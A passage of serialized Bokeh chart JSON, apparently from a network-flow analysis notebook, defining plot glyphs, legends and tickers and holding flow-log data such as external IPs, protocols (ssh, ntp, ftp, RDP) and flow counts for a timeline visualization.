,5,5,5,5,5,5,5,5,5,0,6,6,6,6]},\"selected\":{\"id\":\"4787\"},\"selection_policy\":{\"id\":\"4788\"}},\"id\":\"4738\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"source\":{\"id\":\"4640\"}},\"id\":\"4645\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"4499\",\"type\":\"VBar\"},{\"attributes\":{\"overlay\":{\"id\":\"4745\"},\"x_range\":{\"id\":\"4224\"},\"y_range\":null},\"id\":\"4744\",\"type\":\"RangeTool\"},{\"attributes\":{\"data_source\":{\"id\":\"4566\"},\"glyph\":{\"id\":\"4568\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4569\"},\"view\":{\"id\":\"4571\"}},\"id\":\"4570\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"4643\",\"type\":\"VBar\"},{\"attributes\":{\"data_source\":{\"id\":\"4640\"},\"glyph\":{\"id\":\"4681\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4682\"},\"view\":{\"id\":\"4684\"}},\"id\":\"4683\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"label\":{\"value\":\"ssh\"},\"renderers\":[{\"id\":\"4644\"},{\"id\":\"4683\"}]},\"id\":\"4679\",\"type\":\"LegendItem\"},{\"attributes\":{\"click_policy\":\"hide\",\"label_text_font_size\":\"8pt\",\"location\":\"center\"},\"id\":\"4718\",\"type\":\"Legend\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4534\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"4449\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"4368\"},\"glyph\":{\"id\":\"4370\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4371\"},\"view\":{\"id\":\"4373\"}},\"id\":\"4372\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"4371\",\"type\":\"VBar\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4466\",\"type\":\"Circle\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"104.211.30.1\",\"10.0.3.4\",\"10.0.3.5\",\"104.211.30.1\"],\"FlowDirection\":[\"O\",\"O\",\"I\",\"O\"],\"FlowStartTime\":{\"__ndarray__\":\"AABGPjuOdkIAgHFWO452QgCAcVY7jnZCAID/3zyOdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[4]},\"FlowType\":[\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\"],\"L7Protocol\":[\"ssh\",\"ssh\",\"ssh\",\"ssh\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAAGEAAAAAAAADwPwAAAAAAAPA/AAAAAAAAKEA=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[4]},\"color\":[\"#9DD93A\",\"#9DD93A\",\"#9DD93A\",\"#9DD93A\"],\"index\":[456,457,458,459],\"y_index\":[6,6,6,6]},\"selected\":{\"id\":\"4665\"},\"selection_policy\":{\"id\":\"4666\"}},\"id\":\"4640\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"4745\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"label\":{\"value\":\"ntp\"},\"renderers\":[{\"id\":\"4570\"},{\"id\":\"4607\"}]},\"id\":\"4603\",\"type\":\"LegendItem\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"90.130.70.73\"],\"FlowDirection\":[\"O\"],\"FlowStartTime\":{\"__ndarray__\":\"AID6cjaOdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1]},\"FlowType\":[\"ExternalPublic\"],\"L7Protocol\":[\"ftp\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAA8D8=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1]},\"color\":[\"#440154\"],\"index\":[455],\"y_index\":[0]},\"selected\":{\"id\":\"4268\"},\"selection_policy\":{\"id\":\"4269\"}},\"id\":\"4255\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"source\":{\"id\":\"4430\"}},\"id\":\"4468\",\"type\":\"CDSView\"},{\"attributes\":{\"source\":{\"id\":\"4738\"}},\"id\":\"4743\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"4432\",\"type\":\"VBar\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4606\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"4589\",\"type\":\"Selection\"},{\"attributes\":{\"source\":{\"id\":\"4430\"}},\"id\":\"4435\",\"type\":\"CDSView\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"4796\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4605\",\"type\":\"Circle\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"131.107.147.209\",\"131.107.147.209\",\"131.107.147.209\",\"131.107.147.209\"],\"FlowDirection\":[\"I\",\"I\",\"I\",\"I\"],\"FlowStartTime\":{\"__ndarray__\":\"AICzNCqOdkIAgAn3Ko52QgCA+n40jnZCAAD/1TWOdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[4]},\"FlowType\":[\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\"],\"L7Protocol\":[\"ms-wbt-server\",\"ms-wbt-server\",\"ms-wbt-server\",\"ms-wbt-server\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAAAEAAAAAAAAAmQAAAAAAAAAhAAAAAAAAAAEA=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[4]},\"color\":[\"#1EA087\",\"#1EA087\",\"#1EA087\",\"#1EA087\"],\"index\":[413,414,415,416],\"y_index\":[4,4,4,4]},\"selected\":{\"id\":\"4517\"},\"selection_policy\":{\"id\":\"4518\"}},\"id\":\"4496\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"4257\",\"type\":\"VBar\"},{\"attributes\":{},\"id\":\"4450\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"4272\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"4496\"},\"glyph\":{\"id\":\"4498\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4499\"},\"view\":{\"id\":\"4501\"}},\"id\":\"4500\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data_source\":{\"id\":\"4566\"},\"glyph\":{\"id\":\"4605\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4606\"},\"view\":{\"id\":\"4608\"}},\"id\":\"4607\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4533\",\"type\":\"Circle\"},{\"attributes\":{\"source\":{\"id\":\"4566\"}},\"id\":\"4608\",\"type\":\"CDSView\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"4720\",\"type\":\"Title\"},{\"attributes\":{\"axis_label\":\"TotalAllowedFlows\",\"formatter\":{\"id\":\"4264\"},\"major_label_policy\":{\"id\":\"4262\"},\"ticker\":{\"id\":\"4237\"}},\"id\":\"4236\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"4237\",\"type\":\"BasicTicker\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"4220\"},{\"id\":\"4240\"},{\"id\":\"4241\"},{\"id\":\"4242\"},{\"id\":\"4243\"},{\"id\":\"4244\"}]},\"id\":\"4246\",\"type\":\"Toolbar\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"4312\",\"type\":\"VBar\"},{\"attributes\":{},\"id\":\"4326\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"4270\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"4790\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"label\":{\"value\":\"ms-wbt-server\"},\"renderers\":[{\"id\":\"4500\"},{\"id\":\"4535\"}]},\"id\":\"4531\",\"type\":\"LegendItem\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"4280\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"4243\",\"type\":\"SaveTool\"},{\"attributes\":{\"label\":{\"value\":\"ftp\"},\"renderers\":[{\"id\":\"4259\"},{\"id\":\"4287\"}]},\"id\":\"4283\",\"type\":\"LegendItem\"},{\"attributes\":{\"source\":{\"id\":\"4310\"}},\"id\":\"4344\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"4666\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"4258\",\"type\":\"VBar\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4285\",\"type\":\"Circle\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.179.17.38\"],\"FlowDirection\":[\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\"],\"FlowStartTime\":{\"__ndarray__\":\"AADRNjWOdkIAgI9jOI52QgCAj847jnZCAICPtj+OdkIAgI+kQo52QgCAj4xGjnZCAICPekmOdkIAgI9iTY52QgCAj1BQjnZCAICPOFSOdkIAgI8mV452QgCAjw5bjnZCAICP/F2OdkIAgI/kYY52QgCAj9JkjnZCAICPumiOdkIAgI+oa452QgCAj5BvjnZCAICPfnKOdkIAgI9mdo52QgCAj056jnZCAICPPH2OdkIAgI8kgY52QgAAzhKEjnZCAADO+oeOdkIAAM7oio52QgAAztCOjnZCAADOvpGOdkIAAM6mlY52QgAAzpSYjnZCAADOfJyOdkIAAM5qn452QgAAzlKjjnZCAADOUqOOdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[34]},\"FlowType\":[\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\"],\"L7Protocol\":[\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAAEEAAAAAAAAAUQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAABAAAAAAAAAAEA=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[34]},\"color\":[\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\"],\"index\":[421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454],\"y_index\":[5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5]},\"selected\":{\"id\":\"4589\"},\"selection_policy\":{\"id\":\"4590\"}},\"id\":\"4566\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"overlay\":{\"id\":\"4245\"}},\"id\":\"4241\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"fill_color\":{\"value\":\"blue\"},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"4740\",\"type\":\"Circle\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"4270\"},{\"id\":\"4271\"},{\"id\":\"4272\"},{\"id\":\"4273\"},{\"id\":\"4274\"},{\"id\":\"4275\"},{\"id\":\"4276\"},{\"id\":\"4277\"},{\"id\":\"4278\"},{\"id\":\"4279\"},{\"id\":\"4280\"},{\"id\":\"4281\"}]},\"id\":\"4233\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"4255\"},\"glyph\":{\"id\":\"4285\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4286\"},\"view\":{\"id\":\"4288\"}},\"id\":\"4287\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"4262\",\"type\":\"AllLabels\"},{\"attributes\":{\"source\":{\"id\":\"4368\"}},\"id\":\"4404\",\"type\":\"CDSView\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"4277\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"4368\"}},\"id\":\"4373\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"4498\",\"type\":\"VBar\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"4275\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"4787\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"4788\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"below\":[{\"id\":\"4730\"},{\"id\":\"4735\"}],\"center\":[{\"id\":\"4733\"}],\"height\":120,\"renderers\":[{\"id\":\"4742\"}],\"title\":{\"id\":\"4720\"},\"toolbar\":{\"id\":\"4734\"},\"toolbar_location\":null,\"width\":900,\"x_range\":{\"id\":\"4722\"},\"x_scale\":{\"id\":\"4726\"},\"y_range\":{\"id\":\"4724\"},\"y_scale\":{\"id\":\"4728\"}},\"id\":\"4719\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"4230\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"4724\",\"type\":\"DataRange1d\"},{\"attributes\":{\"axis\":{\"id\":\"4236\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"4239\",\"type\":\"Grid\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"4401\",\"type\":\"Circle\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"65.55.44.109\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"104.43.212.12\",\"40.77.232.95\",\"65.55.44.109\",\"40.77.228.69\",\"13.71.172.130\",\"13.71.172.128\",\"40.124.45.19\",\"172.217.15.99\",\"65.55.44.109\",\"13.71.172.130\",\"40.85.232.64\",\"13.71.172.128\",\"104.43.212.12\",\"40.124.45.19\",\"20.38.98.100\",\"23.96.64.84\",\"65.55.44.108\",\"65.55.44.109\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"40.77.232.95\",\"13.71.172.130\",\"13.71.172.128\",\"40.77.228.69\",\"65.55.44.109\",\"40.124.45.19\",\"23.96.64.84\",\"20.38.98.100\",\"13.82.152.48\",\"65.55.44.109\",\"13.71.172.130\",\"13.71.172.128\",\"40.124.45.19\",\"13.71.172.130\",\"13.71.172.128\",\"40.77.232.95\",\"65.55.44.109\",\"40.124.45.19\",\"40.77.226.250\",\"20.38.98.100\",\"13.71.172.128\",\"13.65.107.32\",\"40.124.45.19\",\"13.67.143.117\",\"52.165.170.112\",\"52.173.28.179\",\"13.71.172.130\",\"40.77.232.95\",\"13.68.93.109\",\"40.77.228.69\",\"65.52.108.92\",\"65.55.44.109\",\"13.83.149.5\",\"13.83.148.235\",\"168.62.32.212\",\"20.38.98.100\",\"40.121.3.131\",\"52.239.152.10\",\"23.47.27.169\",\"65.55.163.78\",\"172.217.15.78\",\"65.55.163.76\",\"172.217.8.3\",\"13.74.179.117\",\"65.55.252.190\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"13.65.107.32\",\"13.67.143.117\",\"40.69.153.67\",\"65.55.44.109\",\"40.77.228.69\",\"99.84.104.63\",\"157.55.134.136\",\"72.21.81.200\",\"204.79.197.200\",\"13.68.226.108\",\"212.13.197.231\",\"46.43.34.31\",\"13.71.172.128\",\"13.71.172.130\",\"52.183.114.173\",\"40.124.45.19\",\"13.65.107.32\",\"65.55.44.109\",\"40.79.85.125\",\"40.77.228.69\",\"13.67.143.117\",\"104.43.212.12\",\"52.239.152.10\",\"20.38.98.100\",\"40.77.226.250\",\"13.71.172.130\",\"65.55.44.109\",\"65.55.44.108\",\"40.77.226.250\",\"40.77.232.95\",\"13.71.172.130\",\"40.79.85.125\",\"65.55.44.109\",\"40.124.45.19\",\"20.38.98.100\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"40.77.228.69\",\"172.217.8.3\",\"13.71.172.130\",\"65.55.44.109\",\"65.55.44.108\",\"40.77.228.69\",\"40.124.45.19\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"40.77.232.95\",\"72.21.81.200\",\"13.71.172.130\",\"20.38.98.100\",\"40.124.45.19\",\"13.68.93.109\",\"65.55.44.108\",\"40.77.228.69\",\"65.55.44.109\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"40.77.226.250\",\"40.124.45.19\",\"40.77.232.95\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"172.217.15.99\",\"40.124.45.19\",\"20.38.98.100\",\"13.71.172.130\",\"65.55.44.109\",\"40.77.228.69\",\"13.71.172.130\",\"40.124.45.19\",\"40.77.228.69\",\"65.55.44.109\",\"65.55.44.108\",\"40.77.226.250\",\"13.71.172.130\",\"20.38.98.100\",\"65.55.44.108\",\"65.55.44.109\",\"40.77.226.250\",\"40.77.232.95\",\"72.21.81.200\",\"13.71.172.130\",\"65.55.44.109\",\"157.55.135.128\",\"40.124.45.19\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"40.77.228.69\",\"20.38.98.100\",\"172.217.15.99\",\"172.217.8.14\",\"52.165.170.112\",\"13.89.220.65\",\"13.71.172.130\",\"65.55.44.109\",\"65.55.44.108\",\"40.77.228.69\",\"40.124.45.19\",\"13.71.172.130\",\"40.77.228.69\",\"65.55.44.109\",\"40.124.45.19\",\"40.77.226.250\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.108\",\"40.77.228.69\",\"65.55.44.109\",\"40.77.226.250\",\"20.38.98.100\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"72.21.81.200\",\"13.71.172.130\",\"40.77.232.95\",\"65.55.44.109\",\"40.124.45.19\",\"13.71.172.130\",\"65.55.44.109\",\"40.77.228.69\",\"40.124.45.19\",\"172.217.15.99\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"40.77.228.69\",\"52.165.170.112\",\"52.165.175.144\",\"13.71.172.130\",\"52.165.170.112\",\"13.89.220.65\",\"52.165.175.144\",\"65.55.44.109\",\"40.77.232.95\",\"20.38.98.100\",\"40.124.45.19\",\"13.71.172.128\",\"13.71.172.130\",\"52.173.26.181\",\"52.165.170.112\",\"13.67.143.117\",\"13.65.107.32\",\"40.124.45.19\",\"20.42.24.50\",\"65.55.44.109\",\"40.77.226.250\",\"13.74.179.117\",\"13.64.188.245\",\"13.83.148.218\",\"65.55.163.80\",\"40.77.232.95\",\"13.71.172.128\",\"13.71.172.130\",\"13.65.107.32\",\"40.124.45.19\",\"65.55.44.108\",\"65.55.44.109\",\"13.68.93.109\",\"13.67.143.117\",\"72.21.81.200\",\"204.79.197.200\",\"134.170.58.123\",\"40.77.226.250\",\"40.77.232.95\",\"13.71.172.130\",\"13.71.172.128\",\"13.65.107.32\",\"40.124.45.19\",\"13.67.143.117\",\"65.55.44.109\",\"40.77.228.69\",\"20.38.98.100\",\"172.217.15.99\",\"13.71.172.130\",\"13.71.172.128\",\"13.65.107.32\",\"40.124.45.19\",\"40.77.228.69\",\"65.55.44.108\",\"65.55.44.109\",\"13.67.143.117\",\"13.71.172.128\",\"13.71.172.130\",\"13.65.107.32\",\"40.124.45.19\",\"13.67.143.117\",\"65.55.44.109\",\"65.55.44.108\",\"40.77.232.95\",\"13.71.172.130\",\"13.71.172.128\",\"13.65.107.32\",\"13.67.143.117\",\"65.55.44.108\",\"65.55.44.109\",\"13.71.172.128\",\"13.71.172.130\",\"65.55.44.109\",\"40.77.228.69\",\"65.55.44.108\",\"40.124.45.19\",\"13.65.107.32\",\"13.67.143.117\",\"20.38.98.100\",\"65.55.44.108\",\"65.55.44.109\",\"13.64.188.245\",\"65.55.163.78\",\"72.21.81.200\",\"172.217.15.99\",\"13.71.172.130\",\"13.71.172.128\",\"13.65.107.32\",\"13.67.143.117\",\"40.77.226.250\",\"40.77.232.95\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"13.65.107.32\",\"13.86.124.191\",\"13.67.143.117\",\"13.89.187.212\",\"65.55.44.109\",\"20.41.41.23\",\"65.55.44.108\",\"157.55.134.142\",\"172.217.15.110\",\"52.239.152.10\",\"168.62.32.212\",\"20.38.98.100\",\"40.77.232.95\",\"40.77.226.250\",\"13.74.179.117\",\"40.91.75.5\",\"65.55.252.190\",\"13.71.172.130\",\"13.71.172.128\",\"40.77.226.250\",\"40.124.45.19\",\"13.65.107.32\",\"13.67.143.117\",\"40.77.228.69\",\"65.55.44.109\",\"13.65.107.32\",\"40.124.45.19\",\"13.71.172.128\",\"13.71.172.130\",\"65.55.44.109\",\"13.67.143.117\",\"13.71.172.130\",\"13.71.172.128\",\"40.77.232.95\",\"40.77.226.250\",\"40.124.45.19\",\"13.65.107.32\",\"13.67.143.117\",\"65.55.44.109\",\"13.71.172.128\",\"13.71.172.130\",\"65.55.44.109\",\"40.77.232.95\",\"40.124.45.19\",\"13.65.107.32\",\"13.67.143.117\",\"172.217.15.99\",\"20.38.98.100\",\"13.71.172.128\",\"13.71.172.130\",\"40.77.226.250\",\"13.65.107.32\",\"40.77.228.69\",\"65.55.44.108\",\"65.55.44.109\",\"13.67.143.117\",\"13.71.172.130\",\"13.71.172.128\",\"65.55.44.108\",\"65.55.44.109\",\"13.65.107.32\",\"40.124.45.19\",\"13.67.143.117\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"13.65.107.32\",\"65.55.44.109\",\"65.55.44.108\",\"40.77.228.69\",\"40.77.226.250\",\"13.67.143.117\",\"13.67.143.117\",\"40.77.232.95\"],\"FlowDirection\":[\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\